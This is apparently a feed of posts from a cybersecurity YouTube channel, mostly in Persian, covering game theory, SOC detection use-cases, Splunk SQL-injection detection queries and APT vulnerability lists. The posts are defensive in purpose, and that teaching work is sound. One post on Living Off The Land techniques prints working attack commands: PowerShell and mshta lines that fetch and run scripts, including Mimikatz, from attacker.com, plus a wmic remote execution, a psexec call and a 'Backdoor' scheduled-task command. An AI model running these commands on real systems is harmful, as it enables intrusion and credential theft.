Welcome to The Elentiya Effect — where #cybersecurity meets Strategy, Game Theory, and Leadership Thinking.
In this channel, we go beyond technical defense. We analyze cyber threats like a strategist, break down real-world #attacks , and teach you how to think like a hacker — but act like a leader.
Every week, we bring you podcasts, deep dives, and practical insights on: ⚔️ Game Theory in Cybersecurity
🎯 Cyber #deception & #defense #strategies
🔍 #soc #Operations & Threat Detection
📊 #risk Management & Decision-Making
🚀 #leadership & Strategic Thinking in Cyber Defense
If you want to understand how attackers think and how defenders can win the game, subscribe to The Elentiya Effect and join the community of strategic cyber defenders.
This is not another cybersecurity channel. This is the strategic lens you’ve been missing.
The Elentiya Effect
**آنچه بسیاری از تحلیلگران را از آینده جا میگذارد، کمبود اطلاعات نیست؛ کمبود مدل ذهنی است.**
در گفتوگوی اخیر پروفسور **Jiang Xueqin**، بیش از آنکه خودِ پیشبینیها برایم جالب باشد، **روش رسیدن به آنها** توجه مرا جلب کرد.
بیشتر تحلیلگران اخبار را دنبال میکنند.
اما او به دنبال **Anomaly** میگردد؛
رویدادی که با منطق رایج سازگار نیست.
او ترور قاسم سلیمانی را صرفاً یک عملیات نظامی نمیبیند؛ بلکه آن را حرکتی میداند که قواعد معمول تعامل میان بازیگران را بر هم زده است. از نگاه او، چنین ناهنجاریهایی نشانه تغییر در استراتژی کلان بازی هستند، نه صرفاً یک رخداد خبری.
این دقیقاً همان چیزی است که نظریه بازیها به ما آموزش میدهد:
**وقتی یکی از بازیکنان حرکتی انجام میدهد که در مدل قبلی منطقی نیست، احتمالاً مدل شما اشتباه است؛ نه حرکت او.**
به همین دلیل، تحلیل راهبردی با جمعآوری خبر تفاوت دارد.
تحلیل راهبردی یعنی پاسخ دادن به چند سؤال:
* بازیکنان اصلی چه کسانی هستند؟
* تابع مطلوبیت هر کدام چیست؟
* چه محدودیتهایی دارند؟
* چه گزینههایی روی میز است؟
* و مهمتر از همه...
* کدام حرکت، قواعد بازی را تغییر میدهد؟
در بسیاری از موارد، آینده را نمیتوان از روی اخبار پیشبینی کرد.
اما میتوان آن را از روی **تغییر ساختار بازی** پیشبینی کرد.
به همین دلیل است که امروز نظریه بازیها دیگر فقط متعلق به اقتصاد نیست.
از امنیت سایبری گرفته تا ژئوپلیتیک، هوش مصنوعی، سیاستگذاری، مذاکره و حتی مدیریت سازمانی، همه به سمت یک سؤال مشترک حرکت کردهاند:
**"بازیکن بعدی، با توجه به انگیزهها و محدودیتهایش، منطقیترین حرکتش چیست؟"**
به اعتقاد من، ارزش واقعی نظریه بازیها در پیدا کردن پاسخ نیست؛
بلکه در **پرسیدن سؤالهای درست** است.
وقتی سؤال درست باشد، حتی پیش از آنکه آینده رخ دهد، میتوان مسیر احتمالی آن را دید.
#GameTheory #Geopolitics #Strategy #CyberSecurity #DecisionMaking #RiskManagement #TheElentiyaEffect
#Jiang #GameTheory
2 months ago | [YT] | 0
View 0 replies
The Elentiya Effect
🚨 Fraud Detection in 200 Milliseconds: Multi-Model AI Under the Elentiya Lens 🚨
Every financial transaction is a race against time. In less than 200 milliseconds, banks and payment systems must decide: Is this transaction legitimate or fraudulent?
Humans can’t react that fast. Traditional systems often miss the subtle tricks. That’s why AI is the backbone of modern fraud detection.
🔹 First generation: Predictive Machine Learning
Fast, reliable, and explainable. It catches anomalies like “impossible travel” between countries. But it fails when fraudsters disguise themselves with creative, text-based tricks.
🔹 Second generation: Language Models (LLMs)
Smarter and context-aware. They read descriptions, detect urgency, spot fake merchant names, and sense psychological manipulation. But they’re slower and demand heavy resources.
🔹 The breakthrough: Multi-Model AI
By combining speed of predictive ML with the depth of LLMs, banks can approve safe transactions instantly, block high-risk ones, and send suspicious cases for deeper AI or human review. The result? Speed + accuracy in one system.
But fraud detection isn’t just about algorithms — it’s a strategic game.
Fraudsters test the system with new tactics.
Banks defend, balancing performance and cost.
Regulators set the rules of the game.
Customers’ behavior creates the signals that models must learn from.
Through the Elentiya Effect, this becomes a multi-player game of strategy, trust, and adaptation. The winners are those who combine technology, policy, and human insight into one unified defense.
💡 Fraud detection in 200 milliseconds is more than technology.
It’s AI + Game Theory + Ethics.
It’s how we protect assets, reduce false positives, and build long-term trust.
⚡ The future of fraud detection isn’t about choosing between speed or intelligence. It’s about embracing multi-model AI — because only together can we keep up with the game.
www.linkedin.com/feed/update/urn:li:activity:73682…
#AI #FraudDetection #Fintech #GameTheory #ElentiyaEffect #MachineLearning #Security
1 year ago | [YT] | 1
View 0 replies
The Elentiya Effect
۱. سناریو:
Silk Typhoon، Volt Typhoon و Salt Typhoon از پیشرفتهترین گروههای APT (Advanced Persistent Threat) هستن که در حال اجرای حملات مخفیانه، کمسر و صدا و بسیار پیچیده روی سازمانها هستن.
این گروهها به روشهای مختلف عمل میکنن:
✅ Silk Typhoon (Hafnium) – متخصص دسترسی اولیه و سرقت اطلاعات از محیطهای ابری و شبکههای خصوصی
✅ Volt Typhoon – متخصص حملات سایبری علیه زیرساختهای حیاتی، پنهانکاری و فعالیتهای بدون فایل (Living-off-the-Land)
✅ Salt Typhoon – متخصص حملات سایبری علیه سازمانهای مالی و دولتی، استفاده از بدافزارهای سفارشی و مهندسی اجتماعی پیشرفته
۲. معیارهای شناسایی:
✅ فعالیت غیرمعمول روی Remote Management Tools (RDP, SSH, AnyDesk, TeamViewer)
✅ استفاده از پروتکلهای مدیریتی مثل WinRM و WMI برای حرکت جانبی
✅ تغییرات در PowerShell Execution Policy
✅ افزایش اتصالات DNS غیرعادی به سرورهای خارجی
✅ ارسال ناگهانی حجم زیادی از دادهها به خارج از شبکه
۳. منابع داده:
📌 لاگهای احراز هویت (Active Directory, VPN, MFA, SSO)
📌 لاگهای اجرای اسکریپت (PowerShell, Bash, Windows Event Logs)
📌 لاگهای شبکه و DNS (Firewall, Proxy, IDS/IPS, DNS Logs)
📌 مانیتورینگ حسابهای کاربری و لاگینهای غیرعادی
۴. شرایط و فیلترها:
🔍 اگر حساب کاربریای که قبلاً از ابزارهای مدیریتی استفاده نکرده، ناگهان شروع به استفاده از WinRM یا SSH کرد
🔍 اگر PowerShell بدون مجوز اجرا شد و متصل به یک دامنه ناشناس شد
🔍 اگر سیستمهای مهم سازمانی شروع به ارسال داده به سرورهای خارجی کردن
🔍 اگر یک کاربر در کمتر از ۲۴ ساعت از چند لوکیشن مختلف وارد شد
۵. پاسخ و اقدامات:
🚨 قرنطینه سیستمهای آلوده و بررسی لاگهای اخیر
🚨 محدود کردن حسابهای مشکوک و بررسی تاریخچه ورودها
🚨 توقف فعالیتهای مشکوک PowerShell# و WMI در سطح شبکه
🚨 بلاک کردن آیپیها و دامنههای مشکوک مرتبط با این گروهها
Silk Typhoon# روی دسترسی اولیه به سیستمهای ابری تمرکز داره
Volt Typhoon# متخصص حرکت جانبی بدون ایجاد فایل و حمله به زیرساختهای حیاتی هست
Salt Typhoon# متخصص حملات سایبری علیه سیستمهای مالی و دولتی هست
1 year ago | [YT] | 2
View 0 replies
The Elentiya Effect
🚨 ۲.۱ یوزکیس تشخیص حذف اجباری UBlock Origin# و تغییرات در مرورگر
۱. #سناریو :
در آخرین آپدیت کروم، UBlock Origin غیرفعال شده و مرورگر به کاربران پیشنهاد میکنه این افزونه رو حذف کنن. مهاجمان ممکنه از این فرصت استفاده کنن و از طریق سیاستهای مرورگر یا اسکریپتهای مخرب، کنترل افزونهها را در اختیار بگیرن.
۲. معیارهای شناسایی:
✅ تغییر در #رجیستری ویندوز یا تنظیمات کروم
✅ اجرای Chrome# با آرگومانهای مشکوک (--disable-extensions)
✅ ارتباطهای مشکوک با سرورهای گوگل برای تغییر سیاستهای افزونه
۳. منابع داده:
📌 لاگهای سیستمعامل (Windows #Event Logs, #Sysmon#)
📌 لاگهای مرورگر (Chrome, #Edge, #Firefox Logs)
📌 ترافیک شبکه ( Proxy Logs, #DNS Logs, #Firewall Logs)
۴. شرایط و فیلترها:
🔍 اگر تغییر در مسیر HKEY_LOCAL_MACHINE\SOFTWARE\Google\Chrome\Extensions شناسایی شد
🔍 اگر پروسه chrome.exe یا msedge.exe با --disable-extensions اجرا شد
🔍 اگر ارتباطهای DNS به clients2.google.com افزایش یافت
۵. پاسخ و اقدامات:
🚨 ارسال هشدار به تیم امنیت
🚨 بررسی دستگاه و مسدود کردن تغییرات غیرمجاز
🚨 اعمال سیاستهای سختگیرانهتر روی مرورگرها
🔥 ۲.۲ یوزکیس تشخیص سوءاستفاده از Kibana از طریق Prototype Pollution
۱. سناریو:
مهاجم از آسیبپذیری Prototype Pollution در Kibana سوءاستفاده میکنه تا به دادهها دسترسی بگیره یا کد مخرب اجرا کنه.
۲. معیارهای شناسایی:
✅ درخواستهای غیرعادی POST به /api/saved_objects
✅ درخواستهایی که شامل __proto__ یا constructor.prototype در Payload هستن
✅ تغییر ناگهانی در سطح دسترسی کاربران Kibana
۳. منابع داده:
📌 لاگهای وبسرور Kibana
📌 لاگهای درخواستهای API (ElasticSearch & Kibana Audit Logs)
۴. شرایط و فیلترها:
🔍 اگر __proto__ در یک درخواست POST مشاهده شد
🔍 اگر کاربری با نقش "Viewer" عملیاتی انجام داد که قبلاً اجازه نداشت
۵. پاسخ و اقدامات:
🚨 هشدار فوری به تیم امنیتی
🚨 مسدود کردن دسترسی از آیپیهای مشکوک
🚨 بررسی دستورات اجرایی در سرور Kibana
📺 ۲.۳ یوزکیس تشخیص Android TV آلوده
۱. سناریو:
برخی از Android TVهای ارزانقیمت، از قبل آلوده به بدافزار هستن و ترافیک مشکوک به سمت C2 Server ارسال میکنن.
۲. معیارهای شناسایی:
✅ ارتباط غیرعادی با سرورهای تبلیغاتی
✅ ارسال درخواستهای زیاد از یک دستگاه Android TV به آیپیهای مشکوک
✅ تلاش برای دانلود فایلهای مشکوک بدون تعامل کاربر
۳. منابع داده:
📌 لاگهای شبکه (Proxy, Firewall, DNS Logs)
📌 مانیتورینگ ترافیک IoT
۴. شرایط و فیلترها:
🔍 اگر دستگاه Android TV به بیش از ۵۰ دامنه تبلیغاتی در ۱۰ دقیقه متصل شد
🔍 اگر دستگاه در ساعات غیرعادی به سرورهای چینی یا ناشناس متصل شد
۵. پاسخ و اقدامات:
🚨 ارسال هشدار و مسدود کردن ترافیک مشکوک
🚨 بررسی دستی دستگاههای آلوده
🕵️ ۲.۴ یوزکیس تشخیص حملات APT در شبکه
۱. سناریو:
مهاجم از یک حساب دزدیدهشده استفاده میکنه تا در محیط سازمان نفوذ کنه و بدون جلب توجه، اطلاعات سرقت کنه.
۲. معیارهای شناسایی:
✅ تلاش برای ورود از دو کشور مختلف در بازه زمانی کوتاه
✅ افزایش ناگهانی در تعداد دستورات PowerShell مشکوک
✅ دسترسی غیرعادی به فایلهای حساس
۳. منابع داده:
📌 لاگهای احراز هویت (AD Logs, VPN Logs)
📌 لاگهای PowerShell و Bash Execution
۴. شرایط و فیلترها:
🔍 اگر یک کاربر در ۱۰ دقیقه از دو کشور مختلف لاگین کرد
🔍 اگر دستورات PowerShell مخرب مانند Invoke-WebRequest اجرا شد
۵. پاسخ و اقدامات:
🚨 غیرفعال کردن حساب مشکوک
🚨 بررسی دستگاهی که این ورودها از آن انجام شده
🔥 ۵. یوزکیس تشخیص سوءاستفاده از آسیبپذیریهای لینوکس و VMware ESXi
۱. سناریو:
هکرها با استفاده از آسیبپذیریهای اخیر کرنل لینوکس و VMware ESXi وارد سرورها میشن و از اونجا برای حرکت جانبی (Lateral Movement) استفاده میکنن.
۲. معیارهای شناسایی:
✅ اجرای دستورات sudo توسط کاربری که قبلاً مجوز نداشته است
✅ تغییرات در فایلهای سیستمی حساس (/etc/passwd, /etc/shadow, /root/.ssh/authorized_keys)
✅ تلاش برای سوءاستفاده از آسیبپذیریهای شناختهشده ESXi
۳. منابع داده:
📌 لاگهای auth.log در لینوکس
📌 لاگهای vmkernel.log در ESXi
📌 مانیتورینگ تغییرات در فایلهای سیستمی
۴. شرایط و فیلترها:
🔍 اگر کاربری با سطح دسترسی عادی sudo اجرا کرد
🔍 اگر در /etc/shadow تغییر ناگهانی اتفاق افتاد
۵. پاسخ و اقدامات:
🚨 ارسال هشدار فوری
🚨 بررسی تاریخچه لاگینهای SSH
🚨 اعمال محدودیتهای امنیتی روی کاربر مشکوک
🏦 ۶. یوزکیس تشخیص حملات Jackpotting روی ATMها
۱. سناریو:
مهاجمان با نصب بدافزار روی ATMها، کنترل کامل بر روی برداشت وجه پیدا میکنن و ATM رو مجبور به پرداخت پول میکنن.
۲. معیارهای شناسایی:
✅ اجرای فایلهای ناشناخته روی ATM
✅ برداشت وجه بدون احراز هویت
✅ ارتباط مشکوک ATM با سرورهای ناشناس
۳. منابع داده:
📌 لاگهای امنیتی ATM
📌 لاگهای شبکه بانکی
۴. شرایط و فیلترها:
🔍 اگر یک ATM در بازه زمانی غیرعادی تراکنشهای زیاد انجام داد
🔍 اگر ATM به یک آدرس IP ناشناس در اینترنت متصل شد
۵. پاسخ و اقدامات:
🚨 هشدار فوری به مرکز SOC
🚨 مسدود کردن ATM مشکوک
🚨 ارسال تیم بررسی به محل فیزیکی ATM
🕵️♂️ ۷. یوزکیس تشخیص فعالیت گروههای هکری چینی (APT27 و i-Soon)
۱. سناریو:
وزارت دادگستری آمریکا اعلام کرده که گروههای چینی APT27 و i-Soon از سال ۲۰۱۱ در حال حمله به سازمانهای دولتی و خصوصی هستن.
۲. معیارهای شناسایی:
✅ تلاش برای ورود غیرمجاز به ایمیلها و سرورها
✅ بررسی ارتباطات با دامنهها و آیپیهای مرتبط با APT27
✅ افزایش غیرعادی در درخواستهای VPN از کشورهای خاص
۳. منابع داده:
📌 لاگهای احراز هویت Active Directory
📌 لاگهای VPN و فایروال
۴. شرایط و فیلترها:
🔍 اگر یک کاربر در مدت کوتاه از چندین کشور تلاش به لاگین کرد
🔍 اگر ارتباطات با آیپیهای مرتبط با APT27 افزایش یافت
۵. پاسخ و اقدامات:
🚨 مسدود کردن آیپیهای مشکوک
🚨 بررسی حسابهای کاربری که احتمال سرقت اطلاعات دارن
💀 ۸. یوزکیس تشخیص سوءاستفاده از PACER برای تحقیقات ضد جرائم سایبری
۱. سناریو:
گروههای هکری دارن از سیستم PACER (Public Access to Court Electronic Records) برای بررسی چگونگی باز شدن پروندههای جرایم سایبری استفاده میکنن.
۲. معیارهای شناسایی:
✅ دسترسیهای غیرمعمول به اسناد حقوقی مرتبط با جرایم سایبری
✅ افزایش ناگهانی در درخواستهای PACER از یک محدوده آیپی خاص
✅ تلاش برای استخراج اطلاعات پروندههای مرتبط با امنیت سایبری
۳. منابع داده:
📌 لاگهای دسترسی به PACER
📌 تحلیل درخواستهای HTTP
۴. شرایط و فیلترها:
🔍 اگر از یک محدوده آیپی خاص تعداد زیادی درخواست PACER در یک بازه کوتاه ارسال شد
۵. پاسخ و اقدامات:
🚨 هشدار به تیم حقوقی و امنیتی
🚨 بررسی آیپیهای مشکوک و مسدودسازی در صورت لزوم
🚀 ۹. یوزکیس تشخیص کلاهبرداری از طریق چتهای متنی (AI Scam Detection)
۱. سناریو:
گوگل سیستم جدیدی برای تشخیص کلاهبرداری متنی معرفی کرده که از هوش مصنوعی برای شناسایی مکالمات مشکوک استفاده میکنه.
۲. معیارهای شناسایی:
✅ شناسایی پیامهای تکراری و مشکوک در چتها
✅ افزایش ناگهانی در گزارشهای اسپم از کاربران
✅ ارسال پیامهای خودکار بدون تعامل انسانی
۳. منابع داده:
📌 لاگهای پیامک و ارتباطات آنلاین
📌 گزارشهای کاربران
۴. شرایط و فیلترها:
🔍 اگر یک شماره خاص در مدت کوتاه تعداد زیادی پیام مشابه ارسال کرد
۵. پاسخ و اقدامات:
🚨 مسدود کردن شماره مشکوک
🚨 هشدار به تیمهای امنیتی برای بررسی
🔥 ۱۰. یوزکیس تشخیص حمله Hunters International به Tata Technologies
۱. سناریو:
گروه هکری Hunters International تهدید کرده که ۱.۴ ترابایت دادههای مهندسی شرکت Tata Technologies رو منتشر میکنه.
۲. معیارهای شناسایی:
✅ بررسی تلاشهای ورود غیرمجاز به سرورهای Tata
✅ بررسی ارسال دادههای بزرگ به خارج از سازمان
✅ مانیتورینگ دامنههای شناختهشده مرتبط با Hunters International
۳. منابع داده:
📌 لاگهای سرورهای فایل و دیتابیس
📌 لاگهای شبکه برای تشخیص ارسال دادههای غیرعادی
۴. شرایط و فیلترها:
🔍 اگر در ۲۴ ساعت گذشته بیش از ۵۰ گیگابایت داده به یک آیپی خارجی ارسال شد
۵. پاسخ و اقدامات:
🚨 مسدود کردن ارتباطات مشکوک
🚨 بررسی کاربرانی که حجم زیادی از دادهها رو منتقل کردن
🔥 ۱۱. یوزکیس تشخیص حملات فیشینگ پیشرفته علیه سازمانها
۱. سناریو:
مهاجمان فیشینگ دارن حملات هدفمند (Spear Phishing) علیه کارکنان سازمان اجرا میکنن تا اعتبارنامهها رو سرقت کنن. این حملات به روشهای مختلف اجرا میشن، از جمله:
ایمیلهای فیشینگ با لینکهای مخرب
فایلهای آلودهی Office و PDF
وبسایتهای جعلی (Clone Websites)
۲. معیارهای شناسایی:
✅ ورودهای مشکوک به حسابهای ایمیل از کشورهای مختلف
✅ کلیک روی لینکهای مخرب در ایمیل
✅ دانلود فایلهای آلوده از دامنههای مشکوک
✅ لاگینهای غیرمعمول بعد از دریافت ایمیل خاص
۳. منابع داده:
📌 لاگهای ایمیل سرور (Exchange, Gmail, O365 Logs)
📌 لاگهای احراز هویت (Active Directory, SSO Logs, VPN Logs)
📌 لاگهای ترافیک شبکه (Firewall, Proxy, IDS/IPS Logs)
۴. شرایط و فیلترها:
🔍 اگر یک کاربر بعد از دریافت ایمیل خاص در کمتر از ۵ دقیقه روی لینک کلیک کرد و وارد شد
🔍 اگر ورودهای حساب ایمیل از دو کشور مختلف در یک بازه زمانی کوتاه انجام شد
🔍 اگر یک دامنه جدید با نمره ریسک بالا (Threat Intelligence) در ایمیل وجود داشت
۵. پاسخ و اقدامات:
🚨 ارسال هشدار به تیم SOC
🚨 بررسی لینکهای مخرب و مسدودسازی دامنهها
🚨 ارسال هشدار به کاربر در صورت ورود غیرعادی
🔥 ۱۲. یوزکیس تشخیص نفوذهای استراتژیک توسط Silk Typhoon, Volt Typhoon و Salt Typhoon
1 year ago | [YT] | 1
View 0 replies
The Elentiya Effect
🔍 #PostgreSQL SQL Injection Detection in #Splunk
✅ CVE-2025-1094 Detection with SPL Queries
This #vulnerability is related to improper escaping of parameters in libpq functions, which can lead to SQL injection attacks.
1️⃣ Detect Suspicious SQL Queries in PostgreSQL Logs
index=postgresql
sourcetype=postgresql_logs
"SELECT * FROM" OR "UNION SELECT" OR "1=1" OR "DROP TABLE" OR "INSERT INTO" OR "xp_cmdshell"
| rex field=_raw "(?<query>SELECT .* FROM.*|UNION SELECT.*|DROP TABLE.*|INSERT INTO.*|xp_cmdshell.*)"
| stats count by query, src, user
| where count > 5
🛠 Explanation:
Looks for common SQL injection patterns (SELECT *, UNION SELECT, DROP TABLE, etc.).
Filters logs from PostgreSQL (sourcetype=postgresql_logs).
Aggregates by source IP (src), user, and query.
Alerts if a single source/user executes more than 5 suspicious queries.
2️⃣ Detect Errors Related to SQL Injection Attempts
index=postgresql
sourcetype=postgresql_logs
"syntax error" OR "unterminated quoted string" OR "unexpected EOF" OR "error in query"
| stats count by user, src, query
| where count > 3
🛠 Explanation:
Identifies errors caused by malformed SQL queries often used in SQLi attempts.
Triggers if the same user/IP encounters more than 3 errors in a short period.
3️⃣ Detect Exploitation via Metasploit
index=postgresql
sourcetype=postgresql_logs
"pg_sleep" OR "pg_read_file" OR "pg_stat_activity"
| stats count by user, src, query
| where count > 2
🛠 Explanation:
Looks for PostgreSQL functions often used in SQLi exploits.
pg_sleep can be used for time-based SQL injection.
pg_read_file can exfiltrate database config.
pg_stat_activity can be used to list active queries for privilege escalation.
4️⃣ Detect Unusual Authentication Activity
index=postgresql
sourcetype=postgresql_logs
"authentication failed" OR "invalid password" OR "brute force detected"
| stats count by src, user
| where count > 10
🛠 Explanation:
Monitors for multiple failed logins, which might indicate an attacker trying different credentials after gaining SQLi access.
5️⃣ Identify Database User Privilege Escalation
index=postgresql
sourcetype=postgresql_logs
"ALTER ROLE" OR "GRANT ALL PRIVILEGES" OR "SET ROLE"
| stats count by user, src, query
| where count > 1
🛠 Explanation:
Detects attackers escalating privileges via SQLi by altering roles or granting admin access.
📌 Applicable Splunk Sourcetypes
Ensure your PostgreSQL logs are properly ingested into Splunk under one of these sourcetypes:
postgresql_logs
db_audit (if database auditing is enabled)
pgsql_audit (third-party PostgreSQL audit logging)
syslog (if PostgreSQL logs are forwarded via syslog)
🛡 Recommended #Mitigation Steps
🔹 Upgrade PostgreSQL to the latest patched version.
🔹 Enable database query logging to track unauthorized SQL commands.
🔹 Use parameterized queries to prevent SQLi vulnerabilities.
🔹 Set up alerts in Splunk for automated detection & response.
1 year ago | [YT] | 3
View 0 replies
The Elentiya Effect
🔍 تکنیکهای Living Off The Land (LOTL) در حملات سایبری – راهنمای کامل
📌 LOTL چیست و چرا خطرناک است؟
🔹 Living Off The Land (LOTL) به تکنیکی در حملات سایبری گفته میشود که مهاجمان به جای استفاده از بدافزارهای قابل شناسایی، از ابزارها، فایلها و قابلیتهای داخلی سیستمعامل و نرمافزارهای قانونی برای پیشبرد حمله استفاده میکنند.
🔹 هدف اصلی این تکنیک، پنهان ماندن از سیستمهای امنیتی و EDR/XDR، عدم نیاز به دانلود بدافزار جدید و کاهش احتمال شناسایی توسط آنتیویروسها و SIEMها است.
🚨 چرا مهاجمان از تکنیک LOTL استفاده میکنند؟
✅ ۱. کاهش شناسایی توسط آنتیویروسها و EDRها – از ابزارهای داخلی سیستم استفاده میشود، بنابراین اجرای آنها غیرمعمول به نظر نمیرسد.
✅ ۲. عدم نیاز به دانلود بدافزار جدید – با اجرای اسکریپتها و ابزارهای از پیش نصبشده در سیستم قربانی، نیازی به دانلود کد مخرب نیست.
✅ ۳. افزایش ماندگاری در سیستم (Persistence) – از ویژگیهای خود سیستمعامل برای ایجاد دسترسی پایدار استفاده میشود.
✅ ۴. حرکت جانبی در شبکه (Lateral Movement) – از ابزارهای داخلی مانند PowerShell برای اجرای دستورات در سایر سیستمهای شبکه استفاده میشود.
📌 تکنیکهای متداول LOTL و ابزارهای مورد استفاده
۱. استفاده از PowerShell برای اجرای حملات بدون فایل (Fileless Attacks)
PowerShell یکی از قدرتمندترین ابزارهای سیستمعامل ویندوز است که مهاجمان از آن برای اجرای کدهای مخرب، دانلود و اجرای اسکریپتها، و سرقت اطلاعات استفاده میکنند.
🔍 مثالهای حمله:
🔹 اجرای یک اسکریپت PowerShell برای استخراج دادههای کاربری:
powershell -exec bypass -w hidden -noprofile -c "IEX (New-Object Net.WebClient).DownloadString('attacker.com/script.ps1')"
🔹 دانلود و اجرای ابزار Mimikatz برای سرقت اطلاعات احراز هویت:
powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('attacker.com/mimikatz.ps1')"
🔹 لاگهای مرتبط در SIEM برای شناسایی: 📂 sourcetype=win:eventlog
📂 sourcetype=win:security
📂 sourcetype=win:powershell
۲. استفاده از Windows Management Instrumentation (WMI) برای اجرای دستورات از راه دور
مهاجمان از WMI برای اجرای کد مخرب در سیستمهای دیگر درون شبکه استفاده میکنند، بدون اینکه نیاز به اجرای بدافزار جدید داشته باشند.
🔍 مثال حمله:
🔹 اجرای یک اسکریپت از راه دور روی کامپیوترهای شبکه:
wmic /node:TargetPC process call create "cmd.exe /c malicious_script.bat"
🔹 لاگهای مرتبط در SIEM برای شناسایی: 📂 sourcetype=win:eventlog
📂 sourcetype=win:wmi
📂 sourcetype=win:security
۳. سوءاستفاده از PsExec برای اجرای کد روی سایر سیستمها
PsExec یک ابزار مایکروسافت برای اجرای دستورات از راه دور است که مهاجمان برای اجرای بدافزار یا اسکریپتهای مخرب روی سیستمهای دیگر درون شبکه از آن استفاده میکنند.
🔍 مثال حمله:
🔹 مهاجم میتواند با استفاده از PsExec روی یک سرور دیگر در شبکه کد اجرا کند:
psexec \\targetPC -u admin -p password cmd.exe /c "malicious_script.bat"
🔹 لاگهای مرتبط در SIEM برای شناسایی: 📂 sourcetype=sysmon
📂 sourcetype=win:security
۴. استفاده از Scheduled Tasks برای ایجاد دسترسی پایدار
مهاجمان از Task Scheduler برای اجرای کد مخرب در فواصل زمانی مشخص و حفظ کنترل روی سیستم قربانی استفاده میکنند.
🔍 مثال حمله:
🔹 ایجاد یک تسک زمانبندیشده برای اجرای یک اسکریپت مخرب:
schtasks /create /tn "Backdoor" /tr "C:\Windows\System32\cmd.exe /c evil.exe" /sc minute /mo 1
🔹 لاگهای مرتبط در SIEM برای شناسایی: 📂 sourcetype=win:eventlog:scheduler
۵. استفاده از MSHTA برای اجرای کدهای مخرب
MSHTA.exe یک ابزار بومی ویندوز برای اجرای اسکریپتهای HTML است که مهاجمان از آن برای اجرای کد مخرب بدون جلب توجه استفاده میکنند.
🔍 مثال حمله:
🔹 اجرای یک کد مخرب از راه دور:
mshta attacker.com/malicious.hta
🔹 لاگهای مرتبط در SIEM برای شناسایی: 📂 sourcetype=win:eventlog
🔍 روشهای شناسایی حملات LOTL در SIEM و EDR
🚀 ۱. شناسایی اجرای غیرعادی ابزارهای ویندوز
🔹 اجرای غیرمنتظره PowerShell، WMI، PsExec، MSHTA و Task Scheduler
🚀 ۲. بررسی ورودهای غیرعادی (Unusual Logins)
🔹 نظارت بر ورودهای ناگهانی مدیران از موقعیتهای جغرافیایی جدید
🚀 ۳. بررسی ارتباطات غیرعادی شبکه (Network Traffic Monitoring)
🔹 ارتباطات ناگهانی با آدرسهای IP ناشناس
🚀 ۴. استفاده از تحلیلهای رفتاری (User Behavior Analytics - UBA)
🔹 شناسایی رفتارهای غیرعادی کاربران مانند افزایش ناگهانی سطح دسترسی یا اجرای فرآیندهای غیرمعمول
🛡 راهکارهای جلوگیری از حملات LOTL
✅ ۱. محدود کردن اجرای PowerShell و WMI برای کاربران غیرمجاز
✅ ۲. غیرفعال کردن ابزارهای اجرایی مانند MSHTA، PsExec و Scheduled Tasks برای کاربران عادی
✅ ۳. نظارت مستمر بر لاگهای SIEM و استفاده از UBA برای شناسایی رفتارهای مشکوک
✅ ۴. اجرای سیاستهای Zero Trust و حداقل سطح دسترسی (Least Privilege Access)
✅ ۵. استفاده از EDR پیشرفته با قابلیت تشخیص فعالیتهای غیرعادی PowerShell و WMI
🚀 نتیجهگیری: چرا تکنیکهای LOTL خطرناک هستند؟
⚠ تکنیکهای LOTL به مهاجمان اجازه میدهند بدون نیاز به بدافزارهای سنتی، درون شبکهی شما پنهان شوند.
⚠ بسیاری از آنتیویروسها و فایروالها نمیتوانند این حملات را تشخیص دهند.
⚠ استفاده از ابزارهای قانونی برای اجرای کد مخرب، تشخیص را برای تیمهای امنیتی سختتر میکند.
🎯 اما خبر خوب این است که اگر لاگهای SIEM را بهدرستی پیکربندی کنید و از تحلیلهای رفتاری استفاده کنید، میتوانید حملات LOTL را قبل از اینکه آسیب جدی وارد کنند، شناسایی کنید!
🔔 آیا فکر میکنید سازمان شما در برابر حملات LOTL آماده است؟ نظرات خود را در کامنتها بنویسید!
🚀 اثر الانتیا را دنبال کنید تا از جدیدترین تهدیدات امنیت سایبری باخبر شوید! 🎙🔥
🔗 #امنیت_سایبری #SIEM #PowerShell #APT #LOTL #EDR #Splunk #ThreatHunting #TheElentiyaEffect 🚀
1 year ago | [YT] | 3
View 0 replies
The Elentiya Effect
لیست کامل آسیبپذیریهای استفادهشده در حملهی Salt Typhoon + لاگهای مرتبط برای شناسایی در SIEM (Splunk, Elastic, QRadar)
حملهی Salt Typhoon یکی از پیچیدهترین حملات سایبری در سال ۲۰۲۴ بود. این گروه APT از چندین آسیبپذیری روز صفر و شناختهشده استفاده کرد تا به زیرساختهای مخابراتی و شبکههای شرکتی نفوذ کند. در اینجا لیست CVEهای استفادهشده، لاگهای مرتبط و بهترین روشهای شناسایی آورده شده است.
🚀 لیست CVEهای استفادهشده و نوع آسیبپذیریها + لاگهای مرتبط
📌 ۱. Fortinet FortiOS & FortiProxy – CVE-2023-27997
✔ نوع آسیبپذیری: Heap-based Buffer Overflow
✔ امکان اجرای کد از راه دور (RCE) بدون احراز هویت
✔ بهرهبرداری از این آسیبپذیری برای دور زدن فایروال و ورود اولیه
🔍 لاگهای مرتبط در SIEM:
📂 sourcetype=fortinet
📂 sourcetype=fortinet:firewall
📂 sourcetype=fortinet:vpn
📌 بررسی تلاشهای مشکوک برای ورود به فایروال و تغییرات غیرمجاز در تنظیمات
📌 ۲. Cisco IOS XE – CVE-2023-20198
✔ نوع آسیبپذیری: Privilege Escalation & Remote Code Execution
✔ ایجاد یک درب پشتی (backdoor) در Web UI
✔ دسترسی غیرمجاز به تنظیمات روترهای شرکتها و تغییر در مسیرهای مسیریابی
🔍 لاگهای مرتبط در SIEM:
📂 sourcetype=cisco:ios
📂 sourcetype=cisco:asa
📂 sourcetype=cisco:fwsm
📌 بررسی تغییرات ناگهانی در تنظیمات روتر، NAT، یا لیستهای کنترل دسترسی (ACL)
📌 ۳. Microsoft Exchange Server – CVE-2023-23397
✔ نوع آسیبپذیری: Privilege Escalation از طریق ایمیل مخرب
✔ سرقت NTLM Hashes از حسابهای مدیران شبکه
✔ استفاده برای اجرای حملات Pass-the-Hash و افزایش سطح دسترسی
🔍 لاگهای مرتبط در SIEM:
📂 sourcetype=msexchange
📂 sourcetype=win:eventlog
📂 sourcetype=exchange:owa
📌 بررسی تلاشهای ناموفق ورود، ورودهای از مکانهای غیرعادی، و ارسال ایمیلهای فیشینگ داخلی
📌 ۴. VMware vCenter Server – CVE-2023-34048
✔ نوع آسیبپذیری: Authentication Bypass در سرورهای مدیریت مجازیسازی
